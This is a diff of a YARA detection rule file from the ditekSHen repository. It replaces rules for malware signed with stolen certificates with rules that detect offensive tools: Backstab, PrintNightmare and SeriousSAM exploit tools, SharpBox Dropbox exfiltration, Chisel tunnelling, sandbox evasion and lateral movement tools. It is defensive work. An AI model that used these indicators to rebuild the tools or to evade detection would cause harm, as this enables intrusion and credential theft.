+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_tools.yar#L902-L921"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "c466a829d8141ba40187309559f62af73ea47e325eb95ef4c634bac60167788b"
+		logic_hash = "fa7dd5eeb9799fd651317ceecbed6c960f16c387dc18723409053e44cd281582"
 		score = 75
-		quality = 75
+		quality = 50
 		tags = "FILE"
-		thumbprint = "7dd9acb2ef0402883c65901ebbafd06e5293d391"
-		importance = 20
+
+	strings:
+		$is1 = "call_new command: " wide
+		$is2 = "call_proxy cmd: " wide
+		$is3 = "download_file: " wide
+		$is4 = "cmdhttp_run" wide
+		$is5 = "sub_proxyhttp_run" wide
+		$is6 = "proxyhttp_run" wide
+		$is7 = "webshell_run" wide
+		$is8 = "/exchangetopicservices/" fullword wide
+		$is9 = "c:\\windows\\system32\\wmipd.dll" fullword wide
+		$iu1 = "%s://+:%d%s" wide
+		$iu2 = "%s://+:%d%spp/" wide
+		$iu3 = "%s://+:%d%spx/" wide
 
 	condition:
-		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Ledger SAS" and pe.signatures [ i ] . serial == "21:c9:a6:da:ff:94:2f:2d:b6:a0:61:4d" )
+		uint16( 0 ) == 0x5a4d and 6 of ( $is* ) or ( all of ( $iu* ) and 2 of ( $is* ) )
 }
-
-rule DITEKSHEN_INDICATOR_KB_CERT_1F55Ae3Fca38827Cde6Cc7Ca1C0D2731 : FILE
+rule DITEKSHEN_INDICATOR_TOOL_Backstab : FILE
 {
 	meta:
-		description = "Detects executables signed with stolen, revoked or invalid certificates"
+		description = "Detect Backstab tool capable of killing antimalware protected processes by leveraging sysinternals Process Explorer (ProcExp) driver"
 		author = "ditekSHen"
-		id = "8a32fa5d-671e-5012-9de1-6afc21751b94"
-		date = "2024-10-04"
-		modified = "2024-10-04"
+		id = "1e514d03-9b78-5e75-9a31-02c0413e23a7"
+		date = "2024-09-25"
+		modified = "2024-09-25"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L3269-L3280"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_tools.yar#L923-L939"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "1aa7c6c5430f196d1031acabfe141c30044c23c4119619752c50f4665966606e"
+		logic_hash = "d25c3ff4d7c120fdf7c275d11da7a321bcbdb275dcfaa699b5bb4bd66167ec92"
 		score = 75
 		quality = 75
 		tags = "FILE"
-		thumbprint = "a279fa4186ef598c5498ba5c0037c7bd4bd57272"
-		importance = 20
+
+	strings:
+		$s1 = "NtLoadDriver: %x" fullword ascii
+		$s2 = "POSIXLY_CORRECT" fullword ascii
+		$s3 = "\\\\.\\PROCEXP" ascii
+		$s4 = "ProcExpOpenProtectedProcess.DeviceIoControl: %" ascii
+		$s5 = "ProcExpKillHandle.DeviceIoControl" ascii
+		$s6 = "[%#llu] [%ws]: %ws" fullword ascii
+		$s7 = "D:P(A;;GA;;;SY)(A;;GRGWGX;;;BA)(A;;GR" wide
+		$s8 = "-k -d c:\\\\driver.sys" ascii
+		$s9 = "backstab.exe -" ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Fcceaeafbbdccccddfbbb" and pe.signatures [ i ] . serial == "1f:55:ae:3f:ca:38:82:7c:de:6c:c7:ca:1c:0d:27:31" )
+		uint16( 0 ) == 0x5a4d and 6 of them
 }
-
-rule DITEKSHEN_INDICATOR_KB_CERT_008D1Bae9F7Aef1A2Bcc0D392F3Edf3A36 : FILE
+rule DITEKSHEN_INDICATOR_TOOL_EXP_Sharpprintnightmare : FILE
 {
 	meta:
-		description = "Detects executables signed with stolen, revoked or invalid certificates"
+		description = "Detect SharpPrintNightmare"
 		author = "ditekSHen"
-		id = "8d1e7615-f462-56eb-9198-30b868572cf1"
-		date = "2024-10-04"
-		modified = "2024-10-04"
+		id = "15f52fce-27cc-52e7-91d5-7e2f6db5b596"
+		date = "2024-09-25"
+		modified = "2024-09-25"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L3282-L3293"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_tools.yar#L941-L961"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "6b15f97a51f25b1292cc3fd80889ea1edb01814d1951ef1d3b4cac5e83c7fbca"
+		logic_hash = "22c890a22ce6b7c1a06068018364f7c5a2afe1bee5b5bc6a8bae3703a11fac26"
 		score = 75
 		quality = 75
 		tags = "FILE"
-		thumbprint = "5927654acf9c66912ff7b41dab516233d98c9d72"
-		importance = 20
+
+	strings:
+		$s1 = "RevertToSelf() Error:" wide
+		$s2 = "NeverGonnaGiveYou" wide
+		$s3 = "\\Amd64\\UNIDRV.DLL" wide
+		$s4 = ":\\Windows\\System32\\DriverStore\\FileRepository\\" wide
+		$s5 = "C:\\Windows\\System32\\spool\\drivers\\x64\\3\\old\\{0}\\{1}" wide
+		$s6 = "\\SharpPrintNightmare\\" ascii
+		$s7 = { 4e 61 6d 65 09 46 75 6c 6c 54 72 75 73 74 01 }
+		$s8 = "SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Print\\PackageInstallation\\Windows x64\\DriverPackages" wide
+		$s9 = "ntprint.inf_amd64" wide
+		$s10 = "AddPrinterDriverEx" wide
+		$s11 = "addPrinter" ascii
+		$s12 = "DRIVER_INFO_2" ascii
+		$s13 = "APD_COPY_" ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Beaffbebfeebbefbeeb" and pe.signatures [ i ] . serial == "00:8d:1b:ae:9f:7a:ef:1a:2b:cc:0d:39:2f:3e:df:3a:36" )
+		uint16( 0 ) == 0x5a4d and 7 of them
 }
-
-rule DITEKSHEN_INDICATOR_KB_CERT_239Ba103C2943D2Dff5E3211D6800D09 : FILE
+rule DITEKSHEN_INDICATOR_TOOL_REC_Adfind : FILE
 {
 	meta:
-		description = "Detects executables signed with stolen, revoked or invalid certificates"
+		description = "Detect ADFind"
 		author = "ditekSHen"
-		id = "1444a44e-2f45-547f-a5fc-0941edd506bc"
-		date = "2024-10-04"
-		modified = "2024-10-04"
+		id = "2f0d02a1-7488-5645-aa08-1eadee2862e8"
+		date = "2024-09-25"
+		modified = "2024-09-25"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L3295-L3306"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_tools.yar#L963-L974"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "b155ba969334945013af40fbf43b8318a221f6212c4a29e0ee98bc02bb9acafb"
+		logic_hash = "41fb9f72032f76adc6f1fccd25a1364f153eb2430063e9d582f3dcd9fc9ac84a"
 		score = 75
 		quality = 75
 		tags = "FILE"
-		thumbprint = "d8ea0533af5c180ce1f4d6bc377b736208b3efbb"
-		importance = 20
+
+	strings:
+		$s1 = "\\AdFind\\AdFind\\AdFind.h" ascii
+		$s2 = "\\AdFind\\AdFind\\AdFind.cpp" ascii
+		$s3 = "\\AdFind\\Release\\AdFind.pdb" ascii
+		$s4 = "joeware_default_adfind.cf" ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Bcafaecbecacbca" and pe.signatures [ i ] . serial == "23:9b:a1:03:c2:94:3d:2d:ff:5e:32:11:d6:80:0d:09" )
+		uint16( 0 ) == 0x5a4d and 2 of them
 }
-
-rule DITEKSHEN_INDICATOR_KB_CERT_205B80A74A5Dddedea6B84A1E1C44010 : FILE
+rule DITEKSHEN_INDICATOR_TOOL_CNC_Chisel : FILE
 {
 	meta:
-		description = "Detects executables signed with stolen, revoked or invalid certificates"
+		description = "Detect binaries using Chisel"
 		author = "ditekSHen"
-		id = "43e34fe4-e580-572e-a14e-5ee58b3bf594"
-		date = "2024-10-04"
-		modified = "2024-10-04"
+		id = "d126f2c8-655f-564f-ae46-f6bd6385dcac"
+		date = "2024-09-25"
+		modified = "2024-09-25"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L3308-L3319"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_tools.yar#L976-L990"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "1af8527193acdbcb3ba0239879c3b23c6ba4e68d920ae4d5ce503d44e32991f7"
+		logic_hash = "08c7b2c4725431c1bf85ae8068f4250c98e58890e3b4c97aa9e419e4f487cada"
 		score = 75
 		quality = 75
 		tags = "FILE"
-		thumbprint = "1a743595dfaa29cd215ec82a6cd29bb434b709cf"
-		importance = 20
+
+	strings:
+		$s1 = "chisel-v" ascii
+		$s2 = "sendchisel-v" ascii
+		$s3 = "<-chiselclosedcookiedomainefenceempty" ascii
+		$ws1 = "Sec-WebSocket-Key" ascii
+		$ws2 = "Sec-WebSocket-Protocol" ascii
+		$ws3 = "Sec-Websocket-Version" ascii
+		$ws4 = "Sec-Websocket-Extensions" ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Befadbffde" and pe.signatures [ i ] . serial == "20:5b:80:a7:4a:5d:dd:ed:ea:6b:84:a1:e1:c4:40:10" )
+		uint16( 0 ) == 0x5a4d and ( 1 of ( $s* ) and 3 of ( $ws* ) )
 }
-
-rule DITEKSHEN_INDICATOR_KB_CERT_6C8D0Cf4D1593Ee8Dc8D34Be71E90251 : FILE
+rule DITEKSHEN_INDICATOR_TOOL_ANT_Sharpedrchecker : FILE
 {
 	meta:
-		description = "Detects executables signed with stolen, revoked or invalid certificates"
+		description = "Detect SharpEDRChecke, C# Implementation of Invoke-EDRChecker"
 		author = "ditekSHen"
-		id = "fe5cbea2-1704-550c-bd2e-82defba20f24"
-		date = "2024-10-04"
-		modified = "2024-10-04"
+		id = "c0b41787-b8b4-5aa7-b1f0-0a89dbebe45e"
+		date = "2024-09-25"
+		modified = "2024-09-25"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L3321-L3332"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_tools.yar#L992-L1023"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "981e4b426e926bd042f25a50de40d3e3462ed5fec0cf7261523b314b908a1276"
+		logic_hash = "77a26ff5298dddebc669d9b6c39905a48a86884cf98adebdf935b94c62d36ddc"
 		score = 75
-		quality = 75
+		quality = 23
 		tags = "FILE"
-		thumbprint = "d481d73bcf1e45db382d0e345f3badde6735d17d"
-		importance = 20
+
+	strings:
+		$pdb1 = "\\SharpEDRChecker.pdb" fullword ascii
+		$x1 = "EDRData" fullword ascii
+		$x2 = "bytesNeeded" fullword ascii
+		$x3 = /\] Checking (Directories|drivers|processes|modules|Registry|Services) \[/ wide
+		$s1 = "CheckService" fullword ascii
+		$s2 = "CheckModule" fullword ascii
+		$s3 = "PrivCheck" fullword ascii
+		$s4 = "ServiceChecker" fullword ascii
+		$s5 = "PrivilegeChecker" fullword ascii
+		$s6 = "FileChecker" fullword ascii
+		$s7 = "DriverChecker" fullword ascii
+		$s8 = "ProcessChecker" fullword ascii
+		$s9 = "DirectoryChecker" fullword ascii
+		$s10 = "RegistryChecker" fullword ascii
+		$s11 = "CheckDriver" fullword ascii
+		$s12 = "CheckServices" fullword ascii
+		$s13 = "CheckDirectories" fullword ascii
+		$s14 = "CheckCurrentProcessModules" fullword ascii
+		$s15 = "CheckProcesses" fullword ascii
+		$s16 = "CheckDrivers" fullword ascii
+		$s17 = "CheckProcess" fullword ascii
+		$s18 = "CheckSubDirectory" fullword ascii
+		$s19 = "CheckDirectory" fullword ascii
+		$s20 = "CheckRegistry" fullword ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Dbdbecdbdfafdc" and pe.signatures [ i ] . serial == "6c:8d:0c:f4:d1:59:3e:e8:dc:8d:34:be:71:e9:02:51" )
+		uint16( 0 ) == 0x5a4d and ( all of ( $x* ) or 10 of ( $s* ) or ( 1 of ( $pdb* ) and ( 1 of ( $x* ) or 2 of ( $s* ) ) ) or ( #x3 > 4 and 2 of them ) )
 }
-
-rule DITEKSHEN_INDICATOR_KB_CERT_7D08A74747557D6016Aaaf47A679312F : FILE
+rule DITEKSHEN_INDICATOR_TOOL_ANT_Invizzzible : FILE
 {
 	meta:
-		description = "Detects executables signed with stolen, revoked or invalid certificates"
+		description = "Detect InviZzzible"
 		author = "ditekSHen"
-		id = "031cf958-1c37-5190-8fbd-6896f1048c9a"
-		date = "2024-10-04"
-		modified = "2024-10-04"
+		id = "23533d1c-e0d8-51c8-ac18-60c845bff197"
+		date = "2024-09-25"
+		modified = "2024-09-25"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L3334-L3345"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_tools.yar#L1025-L1059"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "ff7c9635b9b43bef7401861d5dbf984d1e2aa1ea9e4d3df9ad348c552767628e"
+		logic_hash = "bd84015f9fdc160a6ed9010c5a5905fcf13987b1fdec6fdd9535e315dc3617e8"
 		score = 75
-		quality = 75
+		quality = 48
 		tags = "FILE"
-		thumbprint = "d7fdad88c626b8e6d076f3f414bbae353f444618"
-		importance = 20
+
+	strings:
+		$s1 = "\\\\.\\pipe\\task_sched_se" fullword wide
+		$s2 = "\\\\\\.\\NPF_NdisWanIp" fullword wide
+		$s3 = /--action --(dtt|mra|user-input|cfg|dan|evt|pid|exc|wmi|tsh)/ fullword wide
+		$s4 = "cuckoo_%lu.ini" fullword wide
+		$s5 = "sandbox evasion" wide nocase
+		$s6 = "UnbalancedStack" fullword ascii
+		$s7 = "process_with_long_name" fullword ascii
+		$s8 = "DelaysAccumulation" fullword ascii
+		$s9 = "PidReuse" fullword ascii
+		$s10 = "DeadAnalyzer" fullword ascii
+		$s11 = "SleepDummyPatch" fullword ascii
+		$s12 = "AudioDeviceAbsence" fullword ascii
+		$s14 = "\\\\.\\PhysicalDrive%u" fullword ascii
+		$s15 = "\"countermeasures\":" ascii
+		$s16 = "_%.02u%.02u%.02u_%.02u%.02u%.02u.html" ascii
+		$f1 = ".?AVHyperV@SandboxEvasion@@" ascii
+		$f2 = ".?AVJoebox@SandboxEvasion@@" ascii
+		$f3 = ".?AVKVM@SandboxEvasion@@" ascii
+		$f4 = ".?AVMisc@SandboxEvasion@@" ascii
+		$f5 = ".?AVParallels@SandboxEvasion@@" ascii
+		$f6 = ".?AVQEMU@SandboxEvasion@@" ascii
+		$f7 = ".?AVSandboxie@SandboxEvasion@@" ascii
+		$f8 = ".?AVVBOX@SandboxEvasion@@" ascii
+		$f9 = ".?AVVirtualPC@SandboxEvasion@@" ascii
+		$f10 = ".?AVVMWare@SandboxEvasion@@" ascii
+		$f11 = ".?AVWine@SandboxEvasion@@" ascii
+		$f12 = ".?AVXen@SandboxEvasion@@" ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Abfacfbdcd" and pe.signatures [ i ] . serial == "7d:08:a7:47:47:55:7d:60:16:aa:af:47:a6:79:31:2f" )
+		uint16( 0 ) == 0x5a4d and ( 6 of ( $s* ) or 4 of ( $f* ) or ( 2 of ( $f* ) and 2 of ( $s* ) ) )
 }
-
-rule DITEKSHEN_INDICATOR_KB_CERT_2095C6F1Eadb65Ce02862Bd620623B92 : FILE
+rule DITEKSHEN_INDICATOR_TOOL_EXFIL_Sharpbox : FILE
 {
 	meta:
-		description = "Detects executables signed with stolen, revoked or invalid certificates"
+		description = "Detect SharpBox, C# tool for compressing, encrypting, and exfiltrating data to Dropbox using the Dropbox API"
 		author = "ditekSHen"
-		id = "c44d8942-569b-50c6-8363-0576c7d54dfb"
-		date = "2024-10-04"
-		modified = "2024-10-04"
+		id = "cd834fe2-dc77-509d-a8f9-d631f395bcd8"
+		date = "2024-09-25"
+		modified = "2024-09-25"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L3347-L3358"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_tools.yar#L1061-L1080"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "0b75d8c59486d197f2cdff298114a7367bb6ad4cf71ee28273e0946e42d3f7e8"
+		logic_hash = "b03ab3786b2a2e6774d94be4edf700a7154d8d400c7b2b31c73c68ce9fe0c08a"
 		score = 75
 		quality = 75
 		tags = "FILE"
-		thumbprint = "940a4d4a5aadef70d8c14caac6f11d653e71800f"
-		importance = 20
+
+	strings:
+		$s1 = "UploadData" fullword ascii
+		$s2 = "isAttached" fullword ascii
+		$s3 = "DecryptFile" fullword ascii
+		$s4 = "set_dbxPath" fullword ascii
+		$s5 = "set_dbxToken" fullword ascii
+		$s6 = "set_decrypt" fullword ascii
+		$s7 = "GeneratePass" fullword ascii
+		$s8 = "FileUploadToDropbox" fullword ascii
+		$s9 = "\\SharpBox.pdb" ascii
+		$s10 = "https://content.dropboxapi.com/2/files/upload" fullword wide
+		$s12 = "Dropbox-API-Arg: {\"path\":" wide
+		$s13 = "X509Certificate [{0}] Policy Error: '{1}'" fullword wide
 
 	condition:
-		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Febeecad" and pe.signatures [ i ] . serial == "20:95:c6:f1:ea:db:65:ce:02:86:2b:d6:20:62:3b:92" )
+		uint16( 0 ) == 0x5a4d and 7 of them
 }
-
-rule DITEKSHEN_INDICATOR_KB_CERT_899E32C9Bf2B533B9275C39F8F9Ff96D : FILE
+rule DITEKSHEN_INDICATOR_TOOL_EXP_Serioussam01 : CVE_2021_36934 FILE
 {
 	meta:
-		description = "Detects executables signed with stolen, revoked or invalid certificates"
+		description = "Detect tool variants potentially exploiting SeriousSAM / HiveNightmare CVE-2021-36934"
 		author = "ditekSHen"
-		id = "62ecae58-7576-5170-8eb5-2becd292e5de"
-		date = "2024-10-04"
-		modified = "2024-10-04"
+		id = "e8f24ae4-48fb-5ee7-9e8e-0d144bb3b046"
+		date = "2024-09-25"
+		modified = "2024-09-25"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L3373-L3384"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_tools.yar#L1082-L1104"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "c5fe3726fd19d050e762cc9e4e2099e74e3780c89a75dab55c12e16bfecd8642"
+		logic_hash = "8b9de87dc073e6ba3eb36dd57b31e9749849c2e277f2bcd1c98ffc2d02861e10"
 		score = 75
-		quality = 75
-		tags = "FILE"
-		thumbprint = "329af76d7c84a90f2117893adc255115c3c961c7"
-		importance = 20
+		quality = 25
+		tags = "CVE-2021-36934, FILE"
+
+	strings:
+		$s1 = "VolumeShadowCopy" fullword wide
+		$s2 = "\\\\?\\GLOBALROOT\\Device\\" fullword wide
+		$s3 = "{0}\\{1}$:aad3b435b51404eeaad3b435b51404ee:{2}" fullword wide
+		$s4 = "ASPNET_WP_PASSWORD" fullword wide
+		$s5 = "<ParseSam>b__" ascii
+		$s6 = "<DumpSecret" ascii
+		$s7 = "<ParseSecret" ascii
+		$s8 = "LsaSecretBlob" fullword ascii
+		$s9 = "systemHive" fullword ascii
+		$s10 = "ImportHiveDump" fullword ascii
+		$s11 = "FindShadowVolumes" fullword ascii
+		$s12 = "GetBootKey" fullword ascii
+		$r1 = "[*] SAM" wide
+		$r2 = "[*] SYSTEM" wide
+		$r3 = "[*] SECURITY" wide
 
 	condition:
-		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Eecaaffcbfdffaedcfec" and pe.signatures [ i ] . serial == "89:9e:32:c9:bf:2b:53:3b:92:75:c3:9f:8f:9f:f9:6d" )
+		uint16( 0 ) == 0x5a4d and ( 6 of ( $s* ) or ( all of ( $r* ) and 3 of ( $s* ) ) )
 }
-
-rule DITEKSHEN_INDICATOR_KB_CERT_0B5759Bc22Ad2128B8792E8535F9161E : FILE
+rule DITEKSHEN_INDICATOR_TOOL_EXP_Petitpotam01 : FILE
 {
 	meta:
-		description = "Detects executables signed with stolen, revoked or invalid certificates"
+		description = "Detect tool potentially exploiting/attempting PetitPotam"
 		author = "ditekSHen"
-		id = "c35c4e07-73d9-54d6-a8cb-1558502a82e9"
-		date = "2024-10-04"
-		modified = "2024-10-04"
+		id = "12d7b533-f477-5fbb-8b1f-1a93c9a63500"
+		date = "2024-09-25"
+		modified = "2024-09-25"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L3386-L3397"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_tools.yar#L1127-L1143"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "1ee543c204e5bf004224a2010f8cfd3196bb9c1e96de350548403224eaa502f6"
+		logic_hash = "37a9477b41560904e8874ecaf93eb2667b9450b5d42665677abc1442538f9000"
 		score = 75
-		quality = 75
+		quality = 50
 		tags = "FILE"
-		thumbprint = "ddfd6a93a8d33f0797d5fdfdb9abf2b66e64350a"
-		importance = 20
+
+	strings:
+		$s1 = "\\pipe\\lsarpc" fullword wide
+		$s2 = "\\%s" fullword wide
+		$s3 = "ncacn_np" fullword wide
+		$s4 = /EfsRpc(OpenFileRaw|EncryptFileSrv|DecryptFileSrv|QueryUsersOnFile|QueryRecoveryAgents|RemoveUsersFromFile|AddUsersToFile)/ wide
+		$r1 = "RpcBindingFromStringBindingW" fullword ascii
+		$r2 = "RpcStringBindingComposeW" fullword ascii
+		$r3 = "RpcStringFreeW" fullword ascii
+		$r4 = "RPCRT4.dll" fullword ascii
+		$r5 = "NdrClientCall2" fullword ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Ceeacfeacafdcdffabdbbacf" and pe.signatures [ i ] . serial == "0b:57:59:bc:22:ad:21:28:b8:79:2e:85:35:f9:16:1e" )
+		uint16( 0 ) == 0x5a4d and ( all of ( $s* ) and 4 of ( $r* ) )
 }
-
-rule DITEKSHEN_INDICATOR_KB_CERT_630Cf0E612F12805Ffa00A41D1032D7C : FILE
+rule DITEKSHEN_INDICATOR_TOOL_PET_Sharpstrike : FILE
 {
 	meta:
-		description = "Detects executables signed with stolen, revoked or invalid certificates"
+		description = "Detect SharpStrike post-exploitation tool written in C# that uses either CIM or WMI to query remote systems"
 		author = "ditekSHen"
-		id = "1c3e2b33-24e5-584c-b375-96c1e653a3ca"
-		date = "2024-10-04"
-		modified = "2024-10-04"
+		id = "00b36fce-3d84-51cf-a800-042d7484d78c"
+		date = "2024-09-25"
+		modified = "2024-09-25"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L3399-L3410"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_tools.yar#L1145-L1160"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "2256858ae75c47568fc6a38e2a587d302d99dd396dd398a450eaa6459ed55d13"
+		logic_hash = "c479d85878d9f9659fc157f0c6706703af3748a8740df6a5090cddc720dd7661"
 		score = 75
 		quality = 75
 		tags = "FILE"
-		thumbprint = "107af72db66ec4005ed432e4150a0b6f5a9daf2d"
-		importance = 20
+
+	strings:
+		$x1 = "SharpStrike v" wide
+		$x2 = "[*] Agent is busy" wide
+		$x3 = "SharpStrike_Fody" fullword ascii
+		$s1 = "ServiceLayer.CIM" fullword ascii
+		$s2 = "Models.CIM" fullword ascii
+		$s3 = "<HandleCommand>b__" ascii
+		$s4 = "MemoryStream" fullword ascii
+		$s5 = "GetCommands" fullword ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Dadebfaca" and pe.signatures [ i ] . serial == "63:0c:f0:e6:12:f1:28:05:ff:a0:0a:41:d1:03:2d:7c" )
+		uint16( 0 ) == 0x5a4d and ( 2 of ( $x* ) or all of ( $s* ) )
 }
-
-rule DITEKSHEN_INDICATOR_KB_CERT_603Bce30597089D068320Fc77E400D06 : FILE
+rule DITEKSHEN_INDICATOR_TOOL_LTM_Ladon : FILE
 {
 	meta:
-		description = "Detects executables signed with stolen, revoked or invalid certificates"
+		description = "Detect Ladon tool that assists in lateral movement across a network"
 		author = "ditekSHen"
-		id = "0f2a2411-f3d4-5959-8470-d7424d714c1d"
-		date = "2024-10-04"
-		modified = "2024-10-04"
+		id = "227e63ce-8383-5bb1-870e-6c4e767b402f"
+		date = "2024-09-25"
+		modified = "2024-09-25"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L3412-L3423"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_tools.yar#L1162-L1178"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "1e13c78cec21a015d9593b492ce5040f93247be63c079bfece96a3a74055aeba"
+		logic_hash = "f31276bcbcae672966cfddc9af4f5b507d7244360b421de7fe1e811fb954fb7d"
 		score = 75
 		quality = 75
 		tags = "FILE"
-		thumbprint = "4ddda7e006afb108417627f8f22a6fa416e3f264"
-		importance = 20
+
+	strings:
+		$d1 = "Ladon.VncSharp.dll" fullword ascii
+		$d2 = "Ladon.Renci.SshNet.dll" fullword ascii
+		$s1 = "Ladon." ascii
+		$s2 = "nowPos" fullword ascii
+		$s3 = "Scan" fullword ascii
+		$s4 = "QLZ_STREAMING_BUFFER" fullword ascii
+		$s5 = "sizeDecompressed" fullword ascii
+		$s6 = "UpdateByte" fullword ascii
+		$s7 = "kNumBitPriceShiftBits" fullword ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Fcaddefffedacfc" and pe.signatures [ i ] . serial == "60:3b:ce:30:59:70:89:d0:68:32:0f:c7:7e:40:0d:06" )
+		uint16( 0 ) == 0x5a4d and ( all of ( $d* ) or all of ( $s* ) or ( 1 of ( $d* ) and 5 of ( $s* ) ) )
 }
-
-rule DITEKSHEN_INDICATOR_KB_CERT_5D5D03Edb4Ec4E185Caa3041824Ab75C : FILE
+rule DITEKSHEN_INDICATOR_TOOL_LTM_Ladonexp : FILE
 {
 	meta:
-		description = "Detects executables signed with stolen, revoked or invalid certificates"
+		description = "Detect Ladon tool that assists in lateral movement across a network"
 		author = "ditekSHen"
-		id = "e1c93911-5c7c-5fe8-aed3-014a9bb7379e"
-		date = "2024-10-04"
-		modified = "2024-10-04"
+		id = "bd1e7ef5-ae68-5e0d-8261-0eb765453bae"
+		date = "2024-09-25"
+		modified = "2024-09-25"
 		reference = "https://github.com/ditekshen/detection"
